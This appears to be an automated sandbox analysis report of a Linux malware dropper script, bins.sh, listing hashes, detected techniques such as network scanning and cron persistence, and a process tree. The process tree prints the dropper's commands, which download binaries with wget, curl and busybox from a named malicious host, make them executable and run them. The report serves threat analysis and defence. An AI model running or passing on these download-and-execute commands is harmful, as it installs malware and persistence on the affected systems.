Analysis
-
max time kernel
149s -
max time network
152s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
04-11-2024 18:57
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
31656289d25c2f37fd9883095dbb79eb
-
SHA1
0428f81cd5e5364f5770bdb839f699c84f90ff85
-
SHA256
7cf86de792c519df89706b72fb33fe2b558f456d4e0d0587568d9871dab861b0
-
SHA512
0e73a849c9267030dd9c2f2d35e15d15ba206466485a3399264ff3b95fd7d3328d11a70ffe8fbc0aab8b3174faf17e17f9e3853be28f8cde14c996238f9f3de1
-
SSDEEP
96:YttJttcLddZO+DLgc2LA8sPUJh5SgugegedhOLKCpL40jj/J5Xx5Mhxix6xDCuCY:ZpOYPOdNCw4DCuxwAw4DCuv
Malware Config
Signatures
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Contacts a large (1975) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 2 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodpid Process 739 chmod 747 chmod -
Executes dropped EXE 2 IoCs
Processes:
kgsaO6LZu4ZHWfsQTKTRm2NKSEuiiV6EeO60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQioc pid Process /tmp/kgsaO6LZu4ZHWfsQTKTRm2NKSEuiiV6EeO 740 kgsaO6LZu4ZHWfsQTKTRm2NKSEuiiV6EeO /tmp/60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ 748 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ -
Renames itself 1 IoCs
Processes:
60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQpid Process 749 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc Process File opened for modification /var/spool/cron/crontabs/tmp.Tv5fhf crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Processes:
60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQdescription ioc Process File opened for reading /proc/327/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/776/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/873/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/929/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/1064/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/7/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/677/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/768/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/804/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/812/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/1023/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/1053/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/1074/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/72/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/921/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/949/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/1025/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/1052/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/1082/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/821/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/795/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/19/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/36/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/711/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/831/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/877/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/1014/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/1039/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/1/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/773/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/805/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/825/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/989/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/1018/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/1087/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/71/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/791/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/1020/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/1086/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/73/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/780/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/793/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/814/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/816/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/895/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/912/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/329/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/809/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/874/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/878/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/948/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/764/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/836/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/862/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/904/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/979/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/834/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/770/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/835/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/879/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/897/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/914/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/1003/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ File opened for reading /proc/1004/cmdline 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ -
System Network Configuration Discovery 1 TTPs 7 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
wgetcurlbusyboxwgetwgetcurlbusyboxpid Process 743 wget 744 curl 746 busybox 763 wget 714 wget 736 curl 738 busybox -
Writes file to tmp directory 6 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetcurlbusyboxwgetcurlbusyboxdescription ioc Process File opened for modification /tmp/kgsaO6LZu4ZHWfsQTKTRm2NKSEuiiV6EeO wget File opened for modification /tmp/kgsaO6LZu4ZHWfsQTKTRm2NKSEuiiV6EeO curl File opened for modification /tmp/kgsaO6LZu4ZHWfsQTKTRm2NKSEuiiV6EeO busybox File opened for modification /tmp/60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ wget File opened for modification /tmp/60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ curl File opened for modification /tmp/60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ busybox
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:707
-
/bin/rm/bin/rm bins.sh2⤵PID:709
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/kgsaO6LZu4ZHWfsQTKTRm2NKSEuiiV6EeO2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:714
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/kgsaO6LZu4ZHWfsQTKTRm2NKSEuiiV6EeO2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:736
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/kgsaO6LZu4ZHWfsQTKTRm2NKSEuiiV6EeO2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:738
-
-
/bin/chmodchmod 777 kgsaO6LZu4ZHWfsQTKTRm2NKSEuiiV6EeO2⤵
- File and Directory Permissions Modification
PID:739
-
-
/tmp/kgsaO6LZu4ZHWfsQTKTRm2NKSEuiiV6EeO./kgsaO6LZu4ZHWfsQTKTRm2NKSEuiiV6EeO2⤵
- Executes dropped EXE
PID:740
-
-
/bin/rmrm kgsaO6LZu4ZHWfsQTKTRm2NKSEuiiV6EeO2⤵PID:742
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:743
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:744
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:746
-
-
/bin/chmodchmod 777 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ2⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ./60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:748 -
/bin/shsh -c "crontab -l"3⤵PID:750
-
/usr/bin/crontabcrontab -l4⤵PID:751
-
-
-
/bin/shsh -c "crontab -"3⤵PID:752
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:753
-
-
-
-
/bin/rmrm 60V1ghqzB35ZmIwK5bO4SmlnXuQqmpRbjQ2⤵PID:759
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/OgUatXxWUK6X3nVpJ7pncTwiR8EdUWbXH52⤵
- System Network Configuration Discovery
PID:763
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
151KB
MD56c583043d91c55aa470c08c87058e917
SHA1abf65a5b9bba69980278ad09356e53de8bb89439
SHA2562d63c81a782853efe672a1d9cb00a339ec57207b4075754a1baf1df9af466948
SHA51282ee5f3884edc2cb3e68d8634353964cdb991e250b0592a2f80f5ffb738e64860abe6d030aec0d6ab94596c275b478080579fd65b055cc9055e1ef3de6dd59a5
-
Filesize
112KB
MD505d7857dcead18bbd86d2935f591873c
SHA134d18f41ef35f93d5364ce3e24d74730a4e91985
SHA2562cb1fa4742268fb0196613aee7a39a08a0707b3ef8853280d5060c44f3650d70
SHA512d1793861067758a064ac1d59c80c78f9cb4b64dd680ab4a62dd050156dc0318dde590c7b44c1184c9ee926f73c3fc242662e42645faab6685ecef9d238d2e53e
-
Filesize
210B
MD5dd8bc88936804048dca6a3fb40e2f641
SHA1bee2596574d74937488c8b044e09b642d250ed58
SHA256912ae4035102d398d29aa34cf783ab8cd2be89edf35def1360336ab3d367ae28
SHA5126acf4d5ad33fb1ce9de40a53392a3e1fdb7468bdad6d5e10296d059ac3cdf2b06308340cea64ac4014389b2d5e254480121c442c6d4b3e8ad9d1f6e4d8e5dc23